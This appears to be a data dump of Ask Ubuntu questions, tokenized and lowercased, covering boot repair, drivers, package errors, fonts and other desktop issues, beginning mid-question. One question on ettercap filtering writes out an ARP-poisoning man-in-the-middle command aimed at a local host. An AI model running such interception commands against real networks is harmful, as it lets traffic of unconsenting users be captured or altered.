//cdimages.ubuntu.com/daily-live/current/raring-desktop-amd64.iso : # # # # # # # # # # # # # # # # # # -- 90.1 % cdimages.ubuntu.com : connection refused # # # # # # # # # # # # # # # # # # -- 90.1 % 0.0 kbps aborted failed to retrieve from raring-desktop-amd64.iso aborting , download available in raring-desktop-amd64.iso.part edit : i just tried again and got this error : # # # # # # # # # # # # # # # # # # -- 90.3 % 54.7 kbps 24:29 eta bad status code 408 # # # # # # # # # # # # # # # # # # -- 90.3 % 24.2 kbps aborted i also tried downloading it again in a different directory , and got the same `` connection refused '' message twice . so it is n't just a problem with syncing already downloaded isos . i 've tried deleting the iso and restarting , and also using the i386 version . how can i fix this so i can sync an ubuntu 13.04 iso using zsync ? or is their a better way to sync an development iso ?
251781	reading package list takes forever	i 've been trying to update my stuff on my machine , and it seems like it ca n't read my package list . it seems like every time i do the sudo apt-get install *something* & & sudo apt-get update it gets stuck at reading package list , this have not been a problem before . here is my specs and whatnot : memory : 15.8 gb processor : amd phenom ( tm ) ii x4 965 processor x 4 graphics : gallium 0.4 on amd barts os type : 32-bit netspeed :
251783	12.04lts virtual kernel : no hfs/+ ? why ?	utilizing ubuntu 12.04 linux virtual kernel and it does not appear to support hfs/+ file system . even after update/upgrade , manual re-installation of packages hfsplus , hfsprogs , hfsutils -- - still can not hpmount or mount any hfs/+ volume . cat /proc/filesystem reveals no hfs support . by contrast , the 12.04lts default kernel does support hfsplus after installation followed by update/upgrade . cat /proc/filesystem confirms that there is hfs support . mounting of same media works just fine . so , i was wondering : can anyone confirm whether the 12.04lts virtual kernel supports hfs/+ ? if not supported , why not ? if not supported , when will it be fixed ?
251785	what happens with grub rescue ?	my problem is that i just installed ubuntu 12.10 using wubi , and since i have windows xp i decided not to partition my hard drive . the installation went through fine , and when it finished i restarted my computer . when my computer rebooted , the grub boot screen appeared , with both ubuntu and windows xp as choices , and i chose ubuntu . however , a couple of commands appeared on the screen including the famous grub rescue , and i do n't know what the command is or what to write in this space . please , i 'm a newbie , and ubuntu is my first linux distribution . what do i do ? original text mi problema es que acabé de instalar ubuntu 12.10 por medio de wubi , ya que tengo windows xp y no decidí particionar el disco duro . se descargó bien , luego reinicié el pc y me apareció para escoger entre los dos sistemas operativos , escogí ubuntu pero al escogerlo me aparecían un par de comandos y entre ellos el famoso grub rescue y no sé que comando es , ni sé que escribir en ese espacio . por favor , soy novato , este ubuntu sería mi primera distribución linux , ¿qué hago ?
251791	installing stackless python , how to get modules ?	i 've followed the instructions found here : http : //architects.dzone.com/articles/install-stackless-python and installed stackless . stackless itself works , but unlike what the tutorial said i can not import my python2.7 modules into the stackless python installation . what do i need to do to make it work ? edit : when i try to import my old modules into stackless , for example : > > > import pygame traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named pygame stackless ca n't find the module .
251797	transmission-daemon keeps resetting	i have been trying to configure transmission-daemon so i can connect using the webui avaliable at http : //server.ip-address:9091 , but i just get a message telling me that i should either disable the ip address whitelist or add my current ip to it . i edited the file avaliable at /etc/transmission-daemon/settings.json and modify the rpc-whitelist-enabled parameter to false , save the file and restart the service with : sudo service transmission-daemon restart . after that i double-check the settings.json i just modified just to discover that all my changes have been undone . what is goin on here ? , any one else have seen this behaviour before ?
251800	how do i load compiz preferences file through terminal ?	my compiz gui does not work ( actually , it does work , but changes on it wo n't take any effect ) . i have a compiz preferences file ( .profile ) and i would like to load it through the terminal ( since loading it directly throuhg compiz`s gui will not work ) . how can i do that ? thank you in advance !
251807	glitch while installing or updating software ?	anytime i install something or update ubuntu , i notice this during the ending process in the terminal : linux-image-3.5.0-23-generic linux-image-extra-3.5.0-23-generic linux-image-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) . is there a fix for this ?
251808	can not ping from server when logged in from another machine	so i found out my problem when i would use the curl method on my linux ubunutu 12.10 server at home while logged in from my laptop ( mac osx lion ) . nothing was happening when i would use the curl method so i thought i would try to ping a website where i know its up and running and i would get this : ping : unknown host facebook.com so im guessing there is something blocking something here . i tried other sites with no success . just the same error . i researched elsewhere but i could n't really find a solution . i typed this in terminal : sudo iptables -l ... and i got this response chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination does that look fine to anybody or should there be more information in there ? update i should also add that i am pretty new to hosting my own server and i have a dynamic ip at the moment and not a static one . i have learned a lot over the past short while but just want to give the heads up that i may not know a whole lot about it . that being said everyone seems to think its a dns issue . so i checked the etc/resolv.conf file and there was n't anything in there except a commented message . # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten did i forget a step when setting up my server ? also would this fix the curl issues i was having . i was just trying to install rvm by curl according to the tutorial but nothing happened . no message that it failed or succeeded . update 2 so i did some research and it looks like a known bug with ubuntu 12.10 upgrade , which i had just did before using these commands . dns resolution fails after 12.10 upgrade i thought the above was causing the problem but it was n't in my case here is what reads inside /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.1.131 netmask 255.255.255.0 gateway 192.168.1.1 thanks , joe
251812	how can i open my meteor app 's port to the local network	i 'm running a meteorjs app on localhost:3000 . i 'd like to allow other computers connected to my network access to view the app by visiting my ip address . any ideas on how i can do this ? edit : i 'm running ubuntu 12.10 , and i 've also installed nmap , in case that 's helpful . edit 2 : i 've tried opening the port 3000 up , but i 'm given an error saying it 's already busy .
251813	possible to customize terminal context ( right-click ) menu ?	i am making the transition to ubuntu 10.0.04 from years of windows . it would help if the terminal could have the right-click context menu display the copy command first in the command list , instead of like , 4th . there must be a way to change the ordering of items in the context menu . how would you configure the terminal ( or any ) context menu in ubuntu ?
251821	blank ( missing ) ligatures ( tt , ti , fi , ff etc . ) in ff when cambria / calibri fonts are used	this problem almost fits mine . his font is helvetica , mine are cambria/calibri , his ligatures display as bolded , mine - not at all . so , meetings become meengs , litigation becomes ligaon , etc . makes for a hard read ! now , if i modify css etc . this helps one page . i can try stylish but i do n't want to ( this may change later ) . i also prefer to have these ms c-fonts degrade gracefully , than to have to install them ( especially since i 've read for this i 'll also have to run windoze on my device ) . this caused me to learn great deal about fonts in ubuntu and in general , but i am new to topic , so if i dig under wrong tree , please point me to right one . ; - ) test sites : anything that uses calibri . jeff 's coding horror is one , here is another ( look at title , it 's missing tt in little in my case ) : http : //nabble.documentfoundation.org/a-little-info-about-ligatures-and-e-g-calibri-td4034178.html tried - no avail most common solution ( add to .fonts.conf code to disable embedded bitmaps ) adding css to disable ligatures for ff ( -moz-font-feature-settings : `` liga=0 '' ; ) . fc-match calibri returns calibri regular : changing ( via firebug ) calibri to calibri regular shows all letters as needed , pages display as they should , meetings become meetings and litigations are litigations . aliasing calibri to calibri regular via in .fonts.conf file - does nothing rebuilded fonts cache with sudo fc-cache -v -f checked if not on nouveau drivers - no adjusted settings in settings > appearances > fonts - my fonts look really nice now ! , but calibri in ff still looses what it was loosing toggling configs in /etc/fonts/conf.avail/ , namely antialiasing , autohinting and bitmap-rejecting , but none gave any ( good , not to mention desired ) effects . removing mscorefonts package remains to try cairo-ubuntu and font-config-infinality ( or how it was called ) , from archlinux forum something with blank ligatures via fontconfig user page replacing font instead of aliasing , but aliasing seems to be preferred for narrowing font family ( courier - > courier new ) try to see if it 's not a bug , like with not showing ligatures if font under 20px - and see ff config for changes if you want me to add something , just ask . it 's late and i 'm spent on it 6 hours now , learning about many different font-related things - interesting , really ! - but for now it 's enough . i have fewer leads by the minute . ideas ? what could that be and how to make the font fall-back nicely ?
251822	no display options in amd catalyst center	i want to configure my double monitor system - laptop + external monitor . i used to have the same configuration using my previous laptop ( just bought a new laptop ) . so i installed proprietary linux amd driver downloaded from the official website . everything works fine , i got a huge fps increase after installing . but i can not configure my second monitor in amd catalyst control center , there is no such options ( but i always did in that way ) . i can do so using system setting- > display , but after every reboot i should do it again . an i am just wondering why there are no such options anymore , what has been changed ? thank you .
251823	on android , can i point a file to a folder on the file system so that it syncs to ubuntu one ?	i have an application that generates a file , and i 'd like to have this file automatically sync to ubuntu one . at the moment , i 'm happy for it just to go in the 'ubuntu one ' folder , but being able to specify an alternate folder in my u1 account would also be cool . as it stands , the only way i know how to do this is to generate the file that gets saved to some folder , then open the ubuntu one android app , and specify to add a new file , pointing to the file that was generated . since the application that generates the file allows to me to specify the path , what i want to be able to do is to point it to the 'ubuntu one ' folder so that it gets synced to my account , without needing to add that extra step . i 've had a look in the file system and can see : /sdcard0/u1/ubuntu\ one , but this seems to be only to store files that you specifically select from the app . i guess the android app does n't have a daemon watching folders to auto push new files to u1 - other than perhaps pointing it to a pictures folder , since there is that auto upload photo 's option .
251827	how can i fix my ntfs partition after shrinking in windows ?	in attempting to shrink my ntfs drive to a smaller size , so i can dual boot my currnet windows 7 with a brand new ubuntu 12.10 ( did n't want to use wubi ) , i 've somehow managed to stuff up the drive and what windows can see . essentially , after shrinking it with a partition manager , windows blue screens upon restarting . i shrank it while windows was running ( which is valid to my surprise , according to many windows 7 & 8 dual boot how-tos ) , and it said to restart to finish off the process . other partition managers i burnt to an iso say it 's a raw format . ubuntu *trumpets blare* to the rescue ; the live cd said i can see your ntfs partition sure no problem . so . here 's my issue . i 'd like to recover my drive , so that windows can boot again . whether i then format or not , i 'd like to get windows running so i can do things like run steam and properly back-up ... run other programs that ca n't just be copied over . how do i fix my ntfs partition from an ubuntu live cd ? i 've tried so far : ntfsfix /mount/point/31415 : runs & exits fine ; have tried with all parameters ntfs-label /mount/point/34154 new_label : said sure no problem . has n't helped . fsck /mount/point/3115 : said it ca n't find/run fsck.ntfs . i ca n't find that package either . windows recovery tools : not only does the windows 7 installation disk ( recovery tools ) not pick up that there is a windows installation on the drive , it thinks its a raw format and ca n't read it . consequently , chkdsk does n't work , as it ca n't see there 's contents . help would be greatly appreciated ! ! : ) i 'll update this description with clarifications as they come . clarification ( s ) : windows does n't boot , but does attempt to : i get the windows 7 logo , and the orb things start to spirl , but then it blue screens . the message appears too fast for me to read . i have n't installed ubuntu . i 'm running it from the livecd . safe mode : blue screens during start-up . ( see image above )
251829	can i make an existing live usb persistent ?	i 'd really love to make my ubuntu usb persistent . i 've tried every possible thing on the internet i could find that i was able to do . ( i 'm on os x . ) i 've gone through easily 36 hours of constant work , ( i 've got a few days off here : p ) and i 've yet to get a solution . i 've tried unetbootin , i tried booting in to a virtualbox machine , tried using 3 usbs to put the .iso on another usb from the live install and creating one from inside ubuntu . nothing has worked . i do have a live usb ready to be used right here , but i need it persistent . i have an 8gb drive , so i 've got plenty of space . i 'd like to not have to redo the installation on a usb , and hopefully make it straight from the usb in ubuntu , but if i have to perform this from os x , so be it . also , i 'd like to install most of the backtrack 5 tools on that usb , so i can take it anywhere . how can i fix this issue ? all help is much appreciated !
251830	how to lower the hdd temperature	i have 4 hard disk drives that have temperatures which go beyond the recommended 50 degrees ( celsius ) . ( i have several samsung spinpoint f3 which are 1tb each and they do have good temps , between 32 and 35 degrees . that 's normal for me . but in this case , 50+ is not normal . ) i have already read the question and answer provided here , but none of the solutions helped . what tools can i use or what terminal commands should i execute to lower the temperature of these drives ? and on a similar note , if i were to use a method similar to this one , how would i know which hard drive i am reading ? where can i check to see which hdd is related to , for example , /sys/class/scsi_host/host0/link_power_management_policy ? i have already tested powertop , hddtemp , disks and others to check and try to lower the temp with no luck .
251832	chrome suddenly using too much memory , what 's wrong ?	i just upgraded my ram to double what it used to have and for a couple of weeks everything was running great , but now chrome is eating all of it , i hit 90 % use with only one window and < 50 tabs open . when i close chrome memory use goes down to 15 % or less , is like this app is using ram for the hell of it , since it used to be a little more frugal before . what could be causing this ?
251834	ubuntu v12.10 - how do i get the menu/launch bar back ? lspci | grep vga	my menu and launch bar are gone . it seems almost as if there is no reason for this . i started up my laptop and immediately notice the resolution is not as it should be . my laptop 's resolution is 1920x1080 , or something close to it . the log-in screen looks far larger than it normally would . after logging in i immediately notice i have no menus and no launch bar , or i ca n't seem to access either . i have about three folders on the desktop and , other than the background image , they are the only things in clear view . i have very little experience with linux operating systems , since i 've primarily used windows . i 've wanted to install ubuntu on my laptop for a while now and finally got around to doing it . after installing i needed to install the graphics driver , which i found difficult to do . especially since all the tutorials i read told me i would need to turn off the gui , which i eventually figured out how to do . at first , i simply tried to install the driver without turning off the update , just to see if i could ( i was hesitant about turning off the gui ) . having confirmed that was impossible , i tested the command needed to turn off the gui . the command `` sudo lightdm stop '' seemed to work , and i presumed `` sudo lightdm start '' would turn the gui back on . however , this did not work and in my panic i turned off the laptop - i prayed i had n't done anything harmful , perhaps i did . turning my laptop back on i was relieved to see everything was back to normal - this was prior to the problem stated in the first paragraph . i tried to turn off the gui again to install the driver i had downloaded ( sorry i did n't mention it earlier ) . the second time i tried `` sudo start lightdm '' and still nothing was happening . so i turn off my laptop again - without any obvious consequence , thus far . i gave up after a third attempt . i did n't dare try installing the driver without first knowing i could command the gui to turn back on . i left it alone for a couple of days after that - occasionally getting on to do homework , which surprised me to know i could . i was even able to look up youtube videos . unfortunately , about a day , or two , after using the laptop for those couple of days something strange - and just barely unexpected - happened . i booted ubuntu from the second partition on the hard drive - i had to install ubuntu there due to the fact that the hard drive was already partitioned prior to even opening the box . the first , and smaller partition contains the windows operating system i am attempting to replace - the partition it 's installed on only contain 50gb , and i was hoping to wipe it clean and merge it with the ubuntu partition . anyway , as ubuntu booted up i notice the resolution is off . when the log-in screen appears my background image - which usually fits just right - is zoomed in too much , and the log-in window itself appeared larger than usual . the menu bar , at the top of the screen , is also there at this time , but looks weird to me ( still not exactly sure why ) and after logging in the menu bar disappears . there is no menu bar , no launch bar ( on the left side of the screen ) , only the three folders and background image remain . i kind of think my desktop looks naked , lacking both menu and launch bars . i right-click and go into the desktop background image menu . from there i go to the `` display '' menu and try to fix my resolution - hoping that might , somehow , bring back the menu and launch bars . at this point i am flabbergasted , since my laptop no longer recognizes the true limitation of its resolution . the display menu claims my laptop 's max resolution is 1027x768 ( 4:3 ) . here is a link to a picture i took ( using my phone ) : http : //i.imgur.com/hvuuaid.jpg . i forgot to mention , or notice , that i ca n't close the window which appears in the photo . there are no exit , minimize , or full-screen options for any windows i open . that includes terminal , which i am still able to access . i do n't know if this is something i did ( it 's highly probable that it is ) , but any solution would be helpful . if you notice in the photo , i have only one folder and two programs that appear on my laptop 's desktop . other than this , there is but one more piece of additional information - that may be useful . i had ubuntu installed on my laptop prior to a reinstallation ( the installation mentioned in the paragraphs above ) and had a similar problem occur . this problem was definitely my fault , hence why i reinstalled the os . i was updating during class - because i thought i would have enough time , but it turned out i did n't . i was forced to pack away my laptop , which had put it into sleep/stand-by mode . i guess some important information was lost due to my mistake because everything i described above happened - with one difference . i could not right-click , nor access terminal . i hope i have not caused a similar problem , somehow . unlike that time in class , i had done nothing - besides attempting to install a driver ( the hard way no doubt ) - and there was only a small set of updates , that had successfully been completed ( unlike before ) . this is partly what confuses me .
251837	extra pane missing from files ( nautilus ) 3.6.3 in raring tail	i installed raring tail to have a peek at ubuntu 's next version . then i found out that the formerly known nautilus is now `` files '' . the version seem to have been kept ( i have nautilus nautilus 3.4.2 in ubuntn 12.04 , and files 3.6.3 in ubuntu 13.04 ) but at first sight i can see that there has been lots of changes . what i could n't find is the extra pane ( f3 ) feature . i was wondering if there 's some way to get it back , some fork with this feature , some alternative file manager you can recommend , and if this is the file manager we will get with ubuntu 13.04 i 'd also like to know if there are any more ( un ) features i have n't found out yet thanks a lot
251838	running a bookkeeping script ( sh ) the entire user session	i have a script that does some bookkeeping . this bookkeeping is done after a specified time interval , say 30 minutes . i want the script to be active from the moment a user logs in until the user logs off . at the moment the script looks like this : # ! /bin/sh while true do # do some stuff sleep 1800 done i do n't know how i can configure my system to automatically start executing this script ( especially in a multi threaded fashion since the script will never stop ) . another problem is how this script should end it 's execution . basically the stuff should be done atomatically : better not doing in than a user who logs off in the middle of the execution . furthermore the script should not stall the log off process until the entire script is executed ( something that will never happen ) . how can i achieve these two goals ? i know the script is n't that accurate with time ( since the stuff itself will take some seconds , after a while , the loop will not be executed each 30 minutes ) , but that does n't matter that much .
251845	graphical glitches	so i just installed ubuntu 12.10 from the windows installer ( dual-boot ) . ubuntu seems to boot fine until it gets to the login screen . there are small graphical glitches in the screen and whenever i move the mouse , it becomes even worse ( i can barely see anything on the screen ) . i run it on a mini-laptop with amd athlon 64 processor and ati radeon graphics . it seems to be a problem with my drivers , but i am really new to ubunto and linux and i ca n't find how to solve my problem ( i know very little about the terminal since i used cygwin for ssh communications with a server ) . it is not connected to internet ( i have a wifi , but i ca n't get ubuntu to connect to it ) .
251850	top command not clear	i am using top command on my centos server . mem : 8055100k total , 3832228k used , 4222872k free , 57968k buffers swap : 8191992k total , 0k used , 8191992k free , 3574740k cached in case of memory , i see 3832228k used , but when i check per process consumption , its showing 0 % . can some one tell which process is consuming this memory . i have also attached a screenshot for this .
251852	ubuntu 12.10 not installing via usb stick	i have a dell inspiron 15r ( n5010 ) and i downloaded ubuntu 12.10 onto a 4 gb memory stick . nothing comes up about installation . the only thing that comes up is install ubuntu ( f : ) in autoplay . i open the view files and click the wubi.exe file and the ubuntu menu comes up . i then click demo and full installation . then i click reboot now . it reboots but nothing happens . i tried pressing the fn and f12 keys and nothing happens either . i 'm not quite sure what to do now.. any help would be much appreciated . thank you .
251853	installing ubuntu 12.10 on laptop with formatted hard drive	my windows 7 crashed so i formatted my hard drive . i wanted to try ubuntu so i downloaded it and put it on usb following directions . it installs . i turn my computer off then rearrange my bios so hd boots first . then it says no boot disk and wont load ubuntu even though all files are on hd . what do i do ?
251854	weird laptop fan sound	i just bought a new laptop - samsung series 3 np350v5c-t01us , installed ubuntu 12.10 . everything is ok , except a very annoying sound produced by the fan . if it would be just a constant sound , i mean the same sound all the time , it would be acceptable . but i hear a raising and lowering sound , it seems the speed of the fan is bigger and lower , bigger and lower . the cycle is several seconds . so annoying ... i have tried an opensource video driver , proprietary drivers ( stable and beta ) . any thought , guys ?
251855	sound not working after installing ubuntu 12.04 lts on compaq presario v3000 ( 32 bit )	i installed ubuntu 12.04 lts on my old laptop , a presario v3000 , along with windows vista basic . everything worked fine till i tried to play some music . no sound came ! i checked sound settings in bash . everything was okay . also , sound card drivers are not available for linux on hp website . what can i do ?
251859	how do i get drivers ( especially wlan/bluetooth ) working on hp envy dv6 ?	i have a new hp envy dv6-7315tx laptop . i installed ubuntu 12.10 ( 64 bit ) , which went smoothly after switching the bios to legacy mode , and it has completely replaced windows 8 . however , there are no proprietary drivers listed in jockey at all , and the wifi/bluetooth card does n't work . ubuntu also fails to recognise the fingerprint reader and graphics card . wlan/bluetooth card : ralink rt3290 pcie drivers : ralink/mediatek ( linux ) or hp ( windows ) i 'm aware of this similar question but there was no solution and i 've tried some different things : $ lspci ( relevant part only ) : 0a:00.0 network controller : ralink corp. device 3290 0a:00.1 bluetooth : ralink corp. device 3298 $ lspci -m ( ditto ) : 0a:00.0 0280 : 1814:3290 0a:00.1 0d11 : 1814:3298 i installed ndiswrapper and downloaded the hp driver linked above . the card does n't appear to be listed on the ndiswrapper list so i just went with the hp one . it installed fine and ndiswrapper -l showed the correct chipset id . i followed the next steps in the ubuntu wifi guide : sudo depmod -a sudo modprobe ndiswrapper then attempted to find the wlan interface , but no luck : $ ip addr 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown [ ... ] 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 [ ... ] $ iwconfig eth0 no wireless extensions . lo no wireless extensions . next i tried to install the mediatek linux driver for the card by downloading the tarball from the above-linked site and compiling it . still no luck , even after a reboot . also , $ rfkill list 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no that 's used up the extent of my experience with these things and i 'm stuck with lan for the time being . what else can i try ? [ edit : i had another shot at installing the ralink/mediatek driver and now i have a new network interface : $ lsmod | grep rt3 rt3290sta 1174375 1 $ iwconfig usb0 no wireless extensions . ra0 ralink sta eth0 no wireless extensions . lo no wireless extensions . $ sudo ifconfig ra0 up $ iwconfig usb0 no wireless extensions . ra0 ralink sta essid : '' '' nickname : '' rt3290sta '' mode : auto frequency=2.412 ghz access point : not-associated bit rate:1 mb/s rts thr : off fragment thr : off link quality=10/100 signal level:0 dbm noise level:0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions . lo no wireless extensions . the problem is that i now get bluetooth and wifi both showing as hard blocked in rfkill and the new wireless section of the network manager indicator has the `` wireless is disabled by a hardware switch '' message . the only hardware switch is the f12 button which has always has a red light ( wireless radio disabled ) under ubuntu even though rfkill previously showed it as unblocked and rfkill event does n't react to pressing the button . i made no bios changes since posting this question and there is still no windows os installed on the hard drive . i 'm also not sure about how to automatically handle the ifconfig step above. ] graphics card : nvidia geforce gt 635m edit : working fine with bumblebee . fingerprint reader device : validity ? ? ? ( id 138a:0018 ) edit : found a bug report for fprint tracking support for this device . marked as fix released but no version of that library i found in ppas detected the device .
251860	ubuntu on external hard drive | graphic drivers problem	first of all : i 'm a unfamiliar when it comes to ubuntu or any other linux distros.. question backround : i installed ubuntu 12.10 on my external hard drive . ( desktop pc ) installed closed amd drives because default ones freeze `` desktop '' view . now i plugged external hard drive on my laptop and it says that there is a problem with graphic drivers . laptop graphic card= nvidia gt 555m , desktop pc graphic gard = amd radeon hd 6950 question : is there some way that i do n't have to reinstall graphic drivers everytime when i plug hard drive into different machine . `` just select it . ''
251862	broken count error : linux-generic-pae : depends : linux-image-generic-pae ( = 3.2.0.37.44 ) but 3.2.0.37.45 is installed	i am getting a broken count in synaptic and unable to fix it by running sudo apt-get -f installlooking out for suggestions . following is the extract from the terminal sudo apt-get check reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-generic-pae : depends : linux-image-generic-pae ( = 3.2.0.37.44 ) but 3.2.0.37.45 is installed depends : linux-headers-generic-pae ( = 3.2.0.37.44 ) but 3.2.0.37.45 is installed n : ignoring file '50unattended-upgrades.distrib ' in directory '/etc/apt/apt.conf.d/ ' as it has an invalid filename extension e : unmet dependencies . try using -f. the extract after running sudo apt-get -f install is below sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : openclient-about 3270-common ibm-config-anyconnect openclient-agnclient-notifications xfonts-x3270-misc libqt4-gui ibm-3270-emulator x3270 unity-lens-ocdc anyconnect ibm-cck-ff4 ibm-lotus-upgrade-fix ibm-ocdc-documentation ocdc-unity-tweaks ibm-application-menus use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-generic-pae the following packages will be upgraded : linux-generic-pae 1 upgraded , 0 newly installed , 0 to remove and 181 not upgraded . 1 not fully installed or removed . need to get 0 b/1,728 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-image-generic-pae ( = 3.2.0.37.44 ) ; however : version of linux-image-generic-pae on system is 3.2.0.37.45. linux-generic-pae depends on linux-headers-generic-pae ( = 3.2.0.37.44 ) ; however : version of linux-headers-generic-pae on system is 3.2.0.37.45. dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-generic-pae n : ignoring file '50unattended-upgrades.distrib ' in directory '/etc/apt/apt.conf.d/ ' as it has an invalid filename extension e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am stuck and unable to do any further installs .. hoping some response at the early
251863	cd/dvd drive wo n't eject media - kubuntu 12.04	i have an older gateway computer with a cd writer/dvd player installed , and i just started using kubuntu 12.04 . after i insert a cd or dvd , i 'm unable to eject it with the button on the drive . it sounds like it 's spinning in there without stopping even though i 'm not running the disk in a program . the only way i seem to be able to remove it is by restarting the computer and removing the disk as the computer boots up . i 've been running standard ubuntu 12.04 on this computer until recently , and never had this issue . any thoughts ? thanks ! p.s . i just entered the command `` eject '' in the terminal , and it properly ejected the dvd media . however , after closing the tray , it wo n't reopen , so i entered the same command a second time , and received this response : john-hill @ gateway-e-4100 : ~ $ eject eject : unable to eject , last error : inappropriate ioctl for device john-hill @ gateway-e-4100 : ~ $ or maybe it 's supposed to respond to that command like that , since there 's no media in the drive ?
251864	problem running tgif in ubuntu 12.04.1 lts	i have installed tgif via synaptic package manager in ubuntu 12.04.1 lts . when i tried to run tgif from the terminal i got the following error message : '' fatal error in openfont ( ) : can not open the default ( msg ) font '-*-courier-medium-r-normal-*-14-*-*-*-*-*-iso8859-1 ' . tgif aborted . please let me know what to do .
251866	ettercap filtering does n't work	i cant use ettercap filters . i 'm writing even the most simple filter i can think of : if ( ip.proto == tcp ) { msg ( `` ran filter\n '' ) ; } but even that does n't work . when i compile it using etterfilter and run : sudo ettercap -f /tmp/filter.ef -t -m arp -i wlan1 /192.168.1.6/ // the msg is not printed . with the packet visualization i do see tcp packets , but the filter seem to just not working even though ettercap says `` content filters loaded from /tmp/filter.ef '' . to solve this i 've tried enabling ip_forward , and i 've tried deleting the `` # '' sign in /etc/etter.conf so it will use iptables for it 's redir_command ( lines 168-169 ) do you know how to make filtering work ? i 'm using ettercap ng-0.7.4.2 on ubuntu 12.10
251869	why ca n't i change some file permissions ?	i use ubuntu 12.10 and whenever i click on .tex file it says it is an executable file . i wanted to remove this and tried gksu nautilus , but i ca n't tick off the permission . when i try to remove the tick , it automatically ticks on .
251878	errors were encountered while processing : cinnamon nemo nemo-fileroller	i am getting the following error errors were encountered while processing : cinnamon nemo nemo-fileroller when i run sudo apt-get install < anything > . i have tried sudo apt-get -f install , sudo apt-get -f autoremove . i get the same error . i am unable to install anything .
251879	thunderbird : reply/reply all : a couple of formatting questions	i have a couple of small questions about tweaking the reply/reply all on thunderbird 17.02 ( my apologies if these are addressed in another post but i could not find it ) . the folks at mozillazine forum have not been able to solve this , but there are skilled tb users here who might . this question on ask ubuntu comes close to several of my questions : how do i make thunderbird 's reply format look like outlook 's ? if anyone has suggestions on any of these points ( or if there are add-ons to deal with them ) , i would greatly appreciate hearing ! ( a ) always use the same identity when responding i have mail from a couple of accounts forward to the one i check . as such i have created multiple identities . the mail server which i use will only allow me to use my email on its domain , so it is important that is used as the from : in all emails . the default seems to be that thunderbird finds which identity is used in the original email and use that as the identity . i know i can select the correct one by hitting the pull down at the top next to the from : but i would like to always have it use the default identity so i do not have to deal with this . is there a way to do this ? note : i have thought about just having the one identity , but then when i reply all it gets sent to my other email accounts which i do not want it to do . ( b ) suggest an add-on to format response header in particular way i would like me response header to largely emulate the default forward header . my goal is something like : from : fromname1 sent : date-with-timestamp to : toname1 , ... , tonamen cc : ccname1 , ... , ccnamen subject : subject i have been using smarttemplate 4 which comes very close to doing this , but it is unable to interweave the names and emails ( instead if there are multiple to/from individuals , all names and then all emails are listed ; the author confirms it is not possible to interweave the names and emails ) . is there another add-on which will do this ? note that in the ask ubuntu question i linked to at the top there was a nice suggestion to have email addresses listed as html links which would be great , but the smarttemplate code there does not work well with multiple addresses ( all the emails are combined in one link : yuck ! )
251880	how can i make pidgin a single-window application ?	i can reduce pidgin to two windows , but no further . the buddy list is always separate from whatever grouped chat window i create . is there any way to combine it ? i have come across these plugins , but they do n't have ubuntu-specific instructions : https : //github.com/dm0-/window_merge https : //github.com/sardemff7/pidgin-single-window
251883	is there open source elearning software that works easily on ubuntu ?	i run ubuntu 11.04 and am an elearning specialist . many people use adobe elearning packages ( articulate , storyline and captivate ) to develop online learning programs . is there an open source equivalent ? do these programs run on ubuntu ? i 'm looking forward to a reply , i have searched many places for alternative and have so far not been able to find anything . i do n't write code or work in the 'backend ' so it has to be easy to install and manage .
251884	what happens to my ubuntu when i upgrade windows ?	if i am only upgrading my windows partition from vista to 7 will it erase my entire drive and i will have to reinstall ubuntu as it would if i fresh installed it ? i currently have 12.04 and vista installed on separate partitions on the same hard drive . if it merely eliminates grub i know how to reinstall that .
251887	how to manually update isc bind9	with the rate of vulnerabilities these days , its difficult to keep ahead . there have been no package updates for the dns bind9 recently but there are plenty of vulnerabilities . can someone please assist with a `` how-to '' for a manual installation of the latest stable release of bind9 from isc ?
251890	ubuntu remove/uninstall from single boot system	my problem is i have ubuntu 11.04 installed on my system . i have no other os installed . i have tried to install windows xp using bootable cd of xp . but it does n't work . blank screen appears . how can i remove ubuntu then ? i have tried many ways using gparted and all but no result .
251894	java compiler can not be found	i installed j2ee with j2sdk on my ubuntu 12.04 computer . it is installed at /mallika/glassfish3/jdk7/ . i am able to run any of my java programs in netbeans using this jdk . since netbeans 7 does not support rmi programs , i tried to compile these from command prompt , but then i get the following error on giving the following command : ..~ $ javac rmiclient/logingui.java the program 'javac ' can be found in the following packages : * default-jdk * ecj * gcj-4.6-jdk * openjdk-6-jdk * gcj-4.5-jdk * openjdk-7-jdk try : sudo apt-get install < selected package > my system now has both openjdk ( i do not know where ) and jdk 7 as i mentioned above . how do i set path or something so that i can compile java sources from command prompt .
251895	not able to dual boot to windows 7 after installing ubuntu 12.04	i installed ubuntu 12.04 after installing windows 7 . i have 2 hard disks , one ssd and another hdd . windows was installed in the hdd , and i wanted ubuntu on my ssd . i chose to have boot files in the ssd where i had installed ubuntu . initially after the installation it did n't show the dual boot option and directly booted to ubuntu . but after going through some suggestions i used boot-repair and got grub repaired/installed . but when i restarted again in the boot options i did n't find the windows 7 option . i fear that i have accidentally deleted the windows boot files . this is the link i got after boot-repair : http : //paste.ubuntu.com/1615740/
